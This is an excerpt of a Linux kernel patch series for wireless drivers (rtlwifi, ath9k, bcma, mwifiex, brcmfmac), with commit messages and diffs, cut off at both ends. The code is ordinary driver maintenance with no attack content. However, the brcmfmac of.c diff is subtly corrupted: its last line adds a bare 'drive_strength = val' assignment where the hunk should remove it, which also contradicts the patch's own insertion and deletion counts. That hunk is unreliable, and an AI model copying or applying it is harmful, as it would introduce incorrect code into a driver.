rtl_write_dword(rtlpriv, REG_HIMR, rtlpci->irq_mask[0] & 0xFFFFFFFF); rtl_write_dword(rtlpriv, REG_HIMRE, diff --git a/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c b/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c index 0705e7e3def0..5f14308e8eb3 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c @@ -1584,28 +1584,11 @@ void rtl92ee_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl92ee_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - - tmp = rtl_read_dword(rtlpriv, REG_HISR); - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - rtl_write_dword(rtlpriv, REG_HISRE, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HSISR); - rtl_write_dword(rtlpriv, REG_HSISR, tmp); -} - void rtl92ee_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - rtl92ee_clear_interrupt(hw);/*clear it here first*/ - rtl_write_dword(rtlpriv, REG_HIMR, rtlpci->irq_mask[0] & 0xFFFFFFFF); rtl_write_dword(rtlpriv, REG_HIMRE, rtlpci->irq_mask[1] & 0xFFFFFFFF); rtlpci->irq_enabled = true; diff --git a/drivers/net/wireless/rtlwifi/rtl8723ae/hw.c b/drivers/net/wireless/rtlwifi/rtl8723ae/hw.c index 67bb47d77b68..a4b7eac6856f 100644 --- a/drivers/net/wireless/rtlwifi/rtl8723ae/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8723ae/hw.c @@ -1258,18 +1258,6 @@ void rtl8723e_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl8723e_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - - tmp = rtl_read_dword(rtlpriv, REG_HISR); - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - rtl_write_dword(rtlpriv, REG_HISRE, tmp); -} - void rtl8723e_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); @@ -1284,7 +1272,6 @@ void rtl8723e_disable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - 
rtl8723e_clear_interrupt(hw);/*clear it here first*/ rtl_write_dword(rtlpriv, 0x3a8, IMR8190_DISABLED); rtl_write_dword(rtlpriv, 0x3ac, IMR8190_DISABLED); rtlpci->irq_enabled = false; diff --git a/drivers/net/wireless/rtlwifi/rtl8723be/hw.c b/drivers/net/wireless/rtlwifi/rtl8723be/hw.c index e0f679bbcdaf..c983d2fe147f 100644 --- a/drivers/net/wireless/rtlwifi/rtl8723be/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8723be/hw.c @@ -1634,28 +1634,11 @@ void rtl8723be_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl8723be_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - - tmp = rtl_read_dword(rtlpriv, REG_HISR); - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - rtl_write_dword(rtlpriv, REG_HISRE, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HSISR); - rtl_write_dword(rtlpriv, REG_HSISR, tmp); -} - void rtl8723be_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - rtl8723be_clear_interrupt(hw);/*clear it here first*/ - rtl_write_dword(rtlpriv, REG_HIMR, rtlpci->irq_mask[0] & 0xFFFFFFFF); rtl_write_dword(rtlpriv, REG_HIMRE, rtlpci->irq_mask[1] & 0xFFFFFFFF); rtlpci->irq_enabled = true; diff --git a/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c b/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c index 450bd4d743d0..3236d44b459d 100644 --- a/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c @@ -2253,31 +2253,11 @@ void rtl8821ae_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl8821ae_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - tmp = rtl_read_dword(rtlpriv, REG_HISR); - /*printk("clear interrupt first:\n"); - printk("0x%x = 0x%08x\n",REG_HISR, tmp);*/ - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - /*printk("0x%x = 0x%08x\n",REG_HISRE, tmp);*/ - rtl_write_dword(rtlpriv, REG_HISRE, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HSISR); - /*printk("0x%x = 0x%08x\n",REG_HSISR, tmp);*/ - rtl_write_dword(rtlpriv, REG_HSISR, tmp); -} - void rtl8821ae_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - rtl8821ae_clear_interrupt(hw);/*clear it here first*/ - rtl_write_dword(rtlpriv, REG_HIMR, rtlpci->irq_mask[0] & 0xFFFFFFFF); rtl_write_dword(rtlpriv, REG_HIMRE, rtlpci->irq_mask[1] & 0xFFFFFFFF); rtlpci->irq_enabled = true; From f911085ffa8863c62344876e0ab6073e4258c246 Mon Sep 17 00:00:00 2001 From: Oleksij Rempel Date: Sun, 17 May 2015 21:49:19 +0200 Subject: [PATCH 216/872] ath9k: split ar5008_hw_spur_mitigate and reuse common code in ar9002_hw_spur_mitigate. [ar5008 and ar9002]_hw_spur_mitigate have big portion of identical code. This patch will move common part of ar5008_hw_spur_mitigate to ar5008_hw_cmn_spur_mitigate and reuse it in ar9002_hw_spur_mitigate. As noticed by Joe Perches I reuse ar9002_hw_spur_mitigate (const) version of declarations for pilot_mask_reg and chan_mask_reg. There should be no other difference with original code. 
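A condensed sketch of the resulting call flow (the helper name and its arguments come from the diff below; the elided chip-specific body is only hinted at in the comment):

    /* both radio families now do their chip-specific spur search and register
     * setup, then hand the computed bin over to the shared mask programming */
    static void ar5008_hw_spur_mitigate(struct ath_hw *ah,
                                        struct ath9k_channel *chan)
    {
            int bin;

            /* ... locate bb_spur, program the AR_PHY_TIMING/SPUR registers,
             * bin = bb_spur * 32 ... */
            ar5008_hw_cmn_spur_mitigate(ah, chan, bin);  /* pilot/chan/viterbi masks */
    }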
Signed-off-by: Oleksij Rempel Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath9k/ar5008_phy.c | 155 +++++++++++--------- drivers/net/wireless/ath/ath9k/ar9002_phy.c | 144 +----------------- drivers/net/wireless/ath/ath9k/hw.h | 2 + 3 files changed, 87 insertions(+), 214 deletions(-) diff --git a/drivers/net/wireless/ath/ath9k/ar5008_phy.c b/drivers/net/wireless/ath/ath9k/ar5008_phy.c index 6c23d279525f..8f8793004b9f 100644 --- a/drivers/net/wireless/ath/ath9k/ar5008_phy.c +++ b/drivers/net/wireless/ath/ath9k/ar5008_phy.c @@ -254,86 +254,25 @@ static int ar5008_hw_set_channel(struct ath_hw *ah, struct ath9k_channel *chan) return 0; } -/** - * ar5008_hw_spur_mitigate - convert baseband spur frequency for external radios - * @ah: atheros hardware structure - * @chan: - * - * For non single-chip solutions. Converts to baseband spur frequency given the - * input channel frequency and compute register settings below. - */ -static void ar5008_hw_spur_mitigate(struct ath_hw *ah, - struct ath9k_channel *chan) +void ar5008_hw_cmn_spur_mitigate(struct ath_hw *ah, + struct ath9k_channel *chan, int bin) { - int bb_spur = AR_NO_SPUR; - int bin, cur_bin; - int spur_freq_sd; - int spur_delta_phase; - int denominator; + int cur_bin; int upper, lower, cur_vit_mask; - int tmp, new; int i; - static int pilot_mask_reg[4] = { + int8_t mask_m[123]; + int8_t mask_p[123]; + int8_t mask_amt; + int tmp_mask; + static const int pilot_mask_reg[4] = { AR_PHY_TIMING7, AR_PHY_TIMING8, AR_PHY_PILOT_MASK_01_30, AR_PHY_PILOT_MASK_31_60 }; - static int chan_mask_reg[4] = { + static const int chan_mask_reg[4] = { AR_PHY_TIMING9, AR_PHY_TIMING10, AR_PHY_CHANNEL_MASK_01_30, AR_PHY_CHANNEL_MASK_31_60 }; - static int inc[4] = { 0, 100, 0, 0 }; - - int8_t mask_m[123]; - int8_t mask_p[123]; - int8_t mask_amt; - int tmp_mask; - int cur_bb_spur; - bool is2GHz = IS_CHAN_2GHZ(chan); - - memset(&mask_m, 0, sizeof(int8_t) * 123); - memset(&mask_p, 0, sizeof(int8_t) * 123); - - for (i = 0; i < AR_EEPROM_MODAL_SPURS; i++) { - cur_bb_spur = ah->eep_ops->get_spur_channel(ah, i, is2GHz); - if (AR_NO_SPUR == cur_bb_spur) - break; - cur_bb_spur = cur_bb_spur - (chan->channel * 10); - if ((cur_bb_spur > -95) && (cur_bb_spur < 95)) { - bb_spur = cur_bb_spur; - break; - } - } - - if (AR_NO_SPUR == bb_spur) - return; - - bin = bb_spur * 32; - - tmp = REG_READ(ah, AR_PHY_TIMING_CTRL4(0)); - new = tmp | (AR_PHY_TIMING_CTRL4_ENABLE_SPUR_RSSI | - AR_PHY_TIMING_CTRL4_ENABLE_SPUR_FILTER | - AR_PHY_TIMING_CTRL4_ENABLE_CHAN_MASK | - AR_PHY_TIMING_CTRL4_ENABLE_PILOT_MASK); - - REG_WRITE(ah, AR_PHY_TIMING_CTRL4(0), new); - - new = (AR_PHY_SPUR_REG_MASK_RATE_CNTL | - AR_PHY_SPUR_REG_ENABLE_MASK_PPM | - AR_PHY_SPUR_REG_MASK_RATE_SELECT | - AR_PHY_SPUR_REG_ENABLE_VIT_SPUR_RSSI | - SM(SPUR_RSSI_THRESH, AR_PHY_SPUR_REG_SPUR_RSSI_THRESH)); - REG_WRITE(ah, AR_PHY_SPUR_REG, new); - - spur_delta_phase = ((bb_spur * 524288) / 100) & - AR_PHY_TIMING11_SPUR_DELTA_PHASE; - - denominator = IS_CHAN_2GHZ(chan) ? 
440 : 400; - spur_freq_sd = ((bb_spur * 2048) / denominator) & 0x3ff; - - new = (AR_PHY_TIMING11_USE_SPUR_IN_AGC | - SM(spur_freq_sd, AR_PHY_TIMING11_SPUR_FREQ_SD) | - SM(spur_delta_phase, AR_PHY_TIMING11_SPUR_DELTA_PHASE)); - REG_WRITE(ah, AR_PHY_TIMING11, new); + static const int inc[4] = { 0, 100, 0, 0 }; cur_bin = -6000; upper = bin + 100; @@ -343,6 +282,7 @@ static void ar5008_hw_spur_mitigate(struct ath_hw *ah, int pilot_mask = 0; int chan_mask = 0; int bp = 0; + for (bp = 0; bp < 30; bp++) { if ((cur_bin > lower) && (cur_bin < upper)) { pilot_mask = pilot_mask | 0x1 << bp; @@ -361,7 +301,6 @@ static void ar5008_hw_spur_mitigate(struct ath_hw *ah, for (i = 0; i < 123; i++) { if ((cur_vit_mask > lower) && (cur_vit_mask < upper)) { - /* workaround for gcc bug #37014 */ volatile int tmp_v = abs(cur_vit_mask - bin); @@ -466,6 +405,78 @@ static void ar5008_hw_spur_mitigate(struct ath_hw *ah, REG_WRITE(ah, AR_PHY_MASK2_P_61_45, tmp_mask); } +/** + * ar5008_hw_spur_mitigate - convert baseband spur frequency for external radios + * @ah: atheros hardware structure + * @chan: + * + * For non single-chip solutions. Converts to baseband spur frequency given the + * input channel frequency and compute register settings below. + */ +static void ar5008_hw_spur_mitigate(struct ath_hw *ah, + struct ath9k_channel *chan) +{ + int bb_spur = AR_NO_SPUR; + int bin; + int spur_freq_sd; + int spur_delta_phase; + int denominator; + int tmp, new; + int i; + + int8_t mask_m[123]; + int8_t mask_p[123]; + int cur_bb_spur; + bool is2GHz = IS_CHAN_2GHZ(chan); + + memset(&mask_m, 0, sizeof(int8_t) * 123); + memset(&mask_p, 0, sizeof(int8_t) * 123); + + for (i = 0; i < AR_EEPROM_MODAL_SPURS; i++) { + cur_bb_spur = ah->eep_ops->get_spur_channel(ah, i, is2GHz); + if (AR_NO_SPUR == cur_bb_spur) + break; + cur_bb_spur = cur_bb_spur - (chan->channel * 10); + if ((cur_bb_spur > -95) && (cur_bb_spur < 95)) { + bb_spur = cur_bb_spur; + break; + } + } + + if (AR_NO_SPUR == bb_spur) + return; + + bin = bb_spur * 32; + + tmp = REG_READ(ah, AR_PHY_TIMING_CTRL4(0)); + new = tmp | (AR_PHY_TIMING_CTRL4_ENABLE_SPUR_RSSI | + AR_PHY_TIMING_CTRL4_ENABLE_SPUR_FILTER | + AR_PHY_TIMING_CTRL4_ENABLE_CHAN_MASK | + AR_PHY_TIMING_CTRL4_ENABLE_PILOT_MASK); + + REG_WRITE(ah, AR_PHY_TIMING_CTRL4(0), new); + + new = (AR_PHY_SPUR_REG_MASK_RATE_CNTL | + AR_PHY_SPUR_REG_ENABLE_MASK_PPM | + AR_PHY_SPUR_REG_MASK_RATE_SELECT | + AR_PHY_SPUR_REG_ENABLE_VIT_SPUR_RSSI | + SM(SPUR_RSSI_THRESH, AR_PHY_SPUR_REG_SPUR_RSSI_THRESH)); + REG_WRITE(ah, AR_PHY_SPUR_REG, new); + + spur_delta_phase = ((bb_spur * 524288) / 100) & + AR_PHY_TIMING11_SPUR_DELTA_PHASE; + + denominator = IS_CHAN_2GHZ(chan) ? 
440 : 400; + spur_freq_sd = ((bb_spur * 2048) / denominator) & 0x3ff; + + new = (AR_PHY_TIMING11_USE_SPUR_IN_AGC | + SM(spur_freq_sd, AR_PHY_TIMING11_SPUR_FREQ_SD) | + SM(spur_delta_phase, AR_PHY_TIMING11_SPUR_DELTA_PHASE)); + REG_WRITE(ah, AR_PHY_TIMING11, new); + + ar5008_hw_cmn_spur_mitigate(ah, chan, bin); +} + /** * ar5008_hw_rf_alloc_ext_banks - allocates banks for external radio programming * @ah: atheros hardware structure diff --git a/drivers/net/wireless/ath/ath9k/ar9002_phy.c b/drivers/net/wireless/ath/ath9k/ar9002_phy.c index fc08162b5820..db6624527d99 100644 --- a/drivers/net/wireless/ath/ath9k/ar9002_phy.c +++ b/drivers/net/wireless/ath/ath9k/ar9002_phy.c @@ -169,29 +169,17 @@ static void ar9002_hw_spur_mitigate(struct ath_hw *ah, { int bb_spur = AR_NO_SPUR; int freq; - int bin, cur_bin; + int bin; int bb_spur_off, spur_subchannel_sd; int spur_freq_sd; int spur_delta_phase; int denominator; - int upper, lower, cur_vit_mask; int tmp, newVal; int i; - static const int pilot_mask_reg[4] = { - AR_PHY_TIMING7, AR_PHY_TIMING8, - AR_PHY_PILOT_MASK_01_30, AR_PHY_PILOT_MASK_31_60 - }; - static const int chan_mask_reg[4] = { - AR_PHY_TIMING9, AR_PHY_TIMING10, - AR_PHY_CHANNEL_MASK_01_30, AR_PHY_CHANNEL_MASK_31_60 - }; - static const int inc[4] = { 0, 100, 0, 0 }; struct chan_centers centers; int8_t mask_m[123]; int8_t mask_p[123]; - int8_t mask_amt; - int tmp_mask; int cur_bb_spur; bool is2GHz = IS_CHAN_2GHZ(chan); @@ -288,135 +276,7 @@ static void ar9002_hw_spur_mitigate(struct ath_hw *ah, newVal = spur_subchannel_sd << AR_PHY_SFCORR_SPUR_SUBCHNL_SD_S; REG_WRITE(ah, AR_PHY_SFCORR_EXT, newVal); - cur_bin = -6000; - upper = bin + 100; - lower = bin - 100; - - for (i = 0; i < 4; i++) { - int pilot_mask = 0; - int chan_mask = 0; - int bp = 0; - for (bp = 0; bp < 30; bp++) { - if ((cur_bin > lower) && (cur_bin < upper)) { - pilot_mask = pilot_mask | 0x1 << bp; - chan_mask = chan_mask | 0x1 << bp; - } - cur_bin += 100; - } - cur_bin += inc[i]; - REG_WRITE(ah, pilot_mask_reg[i], pilot_mask); - REG_WRITE(ah, chan_mask_reg[i], chan_mask); - } - - cur_vit_mask = 6100; - upper = bin + 120; - lower = bin - 120; - - for (i = 0; i < 123; i++) { - if ((cur_vit_mask > lower) && (cur_vit_mask < upper)) { - - /* workaround for gcc bug #37014 */ - volatile int tmp_v = abs(cur_vit_mask - bin); - - if (tmp_v < 75) - mask_amt = 1; - else - mask_amt = 0; - if (cur_vit_mask < 0) - mask_m[abs(cur_vit_mask / 100)] = mask_amt; - else - mask_p[cur_vit_mask / 100] = mask_amt; - } - cur_vit_mask -= 100; - } - - tmp_mask = (mask_m[46] << 30) | (mask_m[47] << 28) - | (mask_m[48] << 26) | (mask_m[49] << 24) - | (mask_m[50] << 22) | (mask_m[51] << 20) - | (mask_m[52] << 18) | (mask_m[53] << 16) - | (mask_m[54] << 14) | (mask_m[55] << 12) - | (mask_m[56] << 10) | (mask_m[57] << 8) - | (mask_m[58] << 6) | (mask_m[59] << 4) - | (mask_m[60] << 2) | (mask_m[61] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK_1, tmp_mask); - REG_WRITE(ah, AR_PHY_VIT_MASK2_M_46_61, tmp_mask); - - tmp_mask = (mask_m[31] << 28) - | (mask_m[32] << 26) | (mask_m[33] << 24) - | (mask_m[34] << 22) | (mask_m[35] << 20) - | (mask_m[36] << 18) | (mask_m[37] << 16) - | (mask_m[48] << 14) | (mask_m[39] << 12) - | (mask_m[40] << 10) | (mask_m[41] << 8) - | (mask_m[42] << 6) | (mask_m[43] << 4) - | (mask_m[44] << 2) | (mask_m[45] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK_2, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_M_31_45, tmp_mask); - - tmp_mask = (mask_m[16] << 30) | (mask_m[16] << 28) - | (mask_m[18] << 26) | (mask_m[18] << 24) - | (mask_m[20] << 22) | (mask_m[20] 
<< 20) - | (mask_m[22] << 18) | (mask_m[22] << 16) - | (mask_m[24] << 14) | (mask_m[24] << 12) - | (mask_m[25] << 10) | (mask_m[26] << 8) - | (mask_m[27] << 6) | (mask_m[28] << 4) - | (mask_m[29] << 2) | (mask_m[30] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK_3, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_M_16_30, tmp_mask); - - tmp_mask = (mask_m[0] << 30) | (mask_m[1] << 28) - | (mask_m[2] << 26) | (mask_m[3] << 24) - | (mask_m[4] << 22) | (mask_m[5] << 20) - | (mask_m[6] << 18) | (mask_m[7] << 16) - | (mask_m[8] << 14) | (mask_m[9] << 12) - | (mask_m[10] << 10) | (mask_m[11] << 8) - | (mask_m[12] << 6) | (mask_m[13] << 4) - | (mask_m[14] << 2) | (mask_m[15] << 0); - REG_WRITE(ah, AR_PHY_MASK_CTL, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_M_00_15, tmp_mask); - - tmp_mask = (mask_p[15] << 28) - | (mask_p[14] << 26) | (mask_p[13] << 24) - | (mask_p[12] << 22) | (mask_p[11] << 20) - | (mask_p[10] << 18) | (mask_p[9] << 16) - | (mask_p[8] << 14) | (mask_p[7] << 12) - | (mask_p[6] << 10) | (mask_p[5] << 8) - | (mask_p[4] << 6) | (mask_p[3] << 4) - | (mask_p[2] << 2) | (mask_p[1] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK2_1, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_P_15_01, tmp_mask); - - tmp_mask = (mask_p[30] << 28) - | (mask_p[29] << 26) | (mask_p[28] << 24) - | (mask_p[27] << 22) | (mask_p[26] << 20) - | (mask_p[25] << 18) | (mask_p[24] << 16) - | (mask_p[23] << 14) | (mask_p[22] << 12) - | (mask_p[21] << 10) | (mask_p[20] << 8) - | (mask_p[19] << 6) | (mask_p[18] << 4) - | (mask_p[17] << 2) | (mask_p[16] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK2_2, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_P_30_16, tmp_mask); - - tmp_mask = (mask_p[45] << 28) - | (mask_p[44] << 26) | (mask_p[43] << 24) - | (mask_p[42] << 22) | (mask_p[41] << 20) - | (mask_p[40] << 18) | (mask_p[39] << 16) - | (mask_p[38] << 14) | (mask_p[37] << 12) - | (mask_p[36] << 10) | (mask_p[35] << 8) - | (mask_p[34] << 6) | (mask_p[33] << 4) - | (mask_p[32] << 2) | (mask_p[31] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK2_3, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_P_45_31, tmp_mask); - - tmp_mask = (mask_p[61] << 30) | (mask_p[60] << 28) - | (mask_p[59] << 26) | (mask_p[58] << 24) - | (mask_p[57] << 22) | (mask_p[56] << 20) - | (mask_p[55] << 18) | (mask_p[54] << 16) - | (mask_p[53] << 14) | (mask_p[52] << 12) - | (mask_p[51] << 10) | (mask_p[50] << 8) - | (mask_p[49] << 6) | (mask_p[48] << 4) - | (mask_p[47] << 2) | (mask_p[46] << 0); - REG_WRITE(ah, AR_PHY_BIN_MASK2_4, tmp_mask); - REG_WRITE(ah, AR_PHY_MASK2_P_61_45, tmp_mask); + ar5008_hw_cmn_spur_mitigate(ah, chan, bin); REGWRITE_BUFFER_FLUSH(ah); } diff --git a/drivers/net/wireless/ath/ath9k/hw.h b/drivers/net/wireless/ath/ath9k/hw.h index c1d2d0340feb..e8454db17634 100644 --- a/drivers/net/wireless/ath/ath9k/hw.h +++ b/drivers/net/wireless/ath/ath9k/hw.h @@ -1119,6 +1119,8 @@ bool ar9003_is_paprd_enabled(struct ath_hw *ah); void ar9003_hw_set_chain_masks(struct ath_hw *ah, u8 rx, u8 tx); void ar9003_hw_init_rate_txpower(struct ath_hw *ah, u8 *rate_array, struct ath9k_channel *chan); +void ar5008_hw_cmn_spur_mitigate(struct ath_hw *ah, + struct ath9k_channel *chan, int bin); void ar5008_hw_init_rate_txpower(struct ath_hw *ah, int16_t *rate_array, struct ath9k_channel *chan, int ht40_delta); From cacce073bfd2b4091fbc58e906e7a9a21f538ff6 Mon Sep 17 00:00:00 2001 From: Hauke Mehrtens Date: Thu, 14 May 2015 23:05:49 +0200 Subject: [PATCH 217/872] bcma: add module_bcma_driver() This makes it possible to save some lines of code in drivers with an simple bcma driver registration. 
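For illustration, a bcma client driver that does nothing special in its module init/exit could use the new macro roughly like this (a minimal sketch; the foo_* names and ID table are hypothetical, not part of this patch):

static struct bcma_driver foo_bcma_driver = {
        .name     = KBUILD_MODNAME,
        .id_table = foo_bcma_tbl,
        .probe    = foo_probe,
        .remove   = foo_remove,
};
/* replaces the module_init()/module_exit() boilerplate */
module_bcma_driver(foo_bcma_driver);

The macro simply feeds the driver into module_driver() together with bcma_driver_register()/bcma_driver_unregister(), so the generated init and exit functions do nothing beyond registering and unregistering the driver.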
Signed-off-by: Hauke Mehrtens Signed-off-by: Kalle Valo --- include/linux/bcma/bcma.h | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/include/linux/bcma/bcma.h b/include/linux/bcma/bcma.h index e34f906647d3..2ff4a9961e1d 100644 --- a/include/linux/bcma/bcma.h +++ b/include/linux/bcma/bcma.h @@ -305,6 +305,15 @@ int __bcma_driver_register(struct bcma_driver *drv, struct module *owner); extern void bcma_driver_unregister(struct bcma_driver *drv); +/* module_bcma_driver() - Helper macro for drivers that don't do + * anything special in module init/exit. This eliminates a lot of + * boilerplate. Each module may only use this macro once, and + * calling it replaces module_init() and module_exit() + */ +#define module_bcma_driver(__bcma_driver) \ + module_driver(__bcma_driver, bcma_driver_register, \ + bcma_driver_unregister) + /* Set a fallback SPROM. * See kdoc at the function definition for complete documentation. */ extern int bcma_arch_register_fallback_sprom( From 7b457dd0d631ecc39b5ed88d551c76d0471a11b1 Mon Sep 17 00:00:00 2001 From: Kevin Lo Date: Tue, 19 May 2015 10:18:34 +0800 Subject: [PATCH 218/872] rtlwifi: fix typos in Kconfig This patch fixes typos in drivers/net/wireless/rtlwifi/Kconfig. Signed-off-by: Kevin Lo Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/Kconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/rtlwifi/Kconfig b/drivers/net/wireless/rtlwifi/Kconfig index 5cf509d346e8..73067cac289c 100644 --- a/drivers/net/wireless/rtlwifi/Kconfig +++ b/drivers/net/wireless/rtlwifi/Kconfig @@ -100,7 +100,7 @@ config RTL8821AE select RTLWIFI_PCI select RTLBTCOEXIST ---help--- - This is the driver for Realtek RTL8i821AE/RTL8812AE 802.11av PCIe + This is the driver for Realtek RTL8821AE/RTL8812AE 802.11ac PCIe wireless network adapters. If you choose to build it as a module, it will be called rtl8821ae From ec21dc4a00905acb6c51eef0c29073e71e6e7ca1 Mon Sep 17 00:00:00 2001 From: Avinash Patil Date: Wed, 20 May 2015 16:36:06 +0530 Subject: [PATCH 219/872] mwifiex: reduce severity of debug messages for mgmt rx This ensures dmesg logs are not spammed with "unknown mgmt frame subtype" messages. Reviewed-by: James Cameron Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/util.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/mwifiex/util.c b/drivers/net/wireless/mwifiex/util.c index 3c0b3c1cf259..370323a47ecb 100644 --- a/drivers/net/wireless/mwifiex/util.c +++ b/drivers/net/wireless/mwifiex/util.c @@ -350,8 +350,8 @@ mwifiex_parse_mgmt_packet(struct mwifiex_private *priv, u8 *payload, u16 len, } break; default: - mwifiex_dbg(priv->adapter, ERROR, - "unknown mgmt frame subytpe %#x\n", stype); + mwifiex_dbg(priv->adapter, INFO, + "unknown mgmt frame subtype %#x\n", stype); } return 0; From f58001fa95703ac275efe7d53fb7ca8613618b09 Mon Sep 17 00:00:00 2001 From: Arend van Spriel Date: Wed, 20 May 2015 14:09:47 +0200 Subject: [PATCH 220/872] brcmfmac: allow device tree node without 'interrupts' property As described in the device tree bindings for 'brcm,bcm4329-fmac' nodes, the interrupts property is optional. So add a check for the presence of this property before attempting to parse and map the interrupt. If it is not present, or parsing fails, return and fall back to the in-band SDIO interrupt.
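Condensed, the probe path described above looks like this (a sketch using the same kernel APIs as the diff that follows; the surrounding driver context is omitted):

        /* "interrupts" is optional for brcm,bcm4329-fmac nodes */
        if (!of_find_property(np, "interrupts", NULL))
                return; /* no OOB IRQ described, use in-band SDIO interrupt */

        irq = irq_of_parse_and_map(np, 0);
        if (!irq)
                return; /* mapping failed, again fall back to in-band */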
Reviewed-by: Hante Meuleman Reviewed-by: Pieter-Paul Giesberts Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/of.c | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/of.c b/drivers/net/wireless/brcm80211/brcmfmac/of.c index c824570ddea3..03f35e0c52ca 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/of.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/of.c @@ -39,10 +39,16 @@ void brcmf_of_probe(struct brcmf_sdio_dev *sdiodev) if (!sdiodev->pdata) return; + if (of_property_read_u32(np, "brcm,drive-strength", &val) == 0) + sdiodev->pdata->drive_strength = val; + + /* make sure there are interrupts defined in the node */ + if (!of_find_property(np, "interrupts", NULL)) + return; + irq = irq_of_parse_and_map(np, 0); if (!irq) { brcmf_err("interrupt could not be mapped\n"); - devm_kfree(dev, sdiodev->pdata); return; } irqf = irqd_get_trigger_type(irq_get_irq_data(irq)); @@ -50,7 +56,4 @@ void brcmf_of_probe(struct brcmf_sdio_dev *sdiodev) sdiodev->pdata->oob_irq_supported = true; sdiodev->pdata->oob_irq_nr = irq; sdiodev->pdata->oob_irq_flags = irqf; - - if (of_property_read_u32(np, "brcm,drive-strength", &val) == 0) + sdiodev->pdata->drive_strength = val; } From 464a5f3f0429c5a6d38d3b4899d38c4b66b18f02 Mon Sep 17 00:00:00 2001 From: Hante Meuleman Date: Wed, 20 May 2015 14:09:48 +0200 Subject: [PATCH 221/872] brcmfmac: Improve throughput by scheduling msgbuf flow worker. The tx flow worker in msgbuf is scheduled from the tx path until a certain threshold has been reached; after that, the tx completions take over the scheduling. When AMSDU and AMPDU are used, frames are transferred over the air in large bursts; in combination with this scheduling algorithm and the buffer limiters in the stack, this can result in limited throughput. This change causes the flow worker to be scheduled more frequently from the tx path.
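The heart of the change is in brcmf_msgbuf_txdata(): the enqueue now returns the queue depth, and the worker is forced to run every BRCMF_MSGBUF_TRICKLE_TXWORKER_THRS queued frames (condensed from the diff below):

        queue_count = brcmf_flowring_enqueue(flow, flowid, skb);
        /* kick the flow worker unconditionally every THRS frames */
        force = ((queue_count % BRCMF_MSGBUF_TRICKLE_TXWORKER_THRS) == 0);
        brcmf_msgbuf_schedule_txdata(msgbuf, flowid, force);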
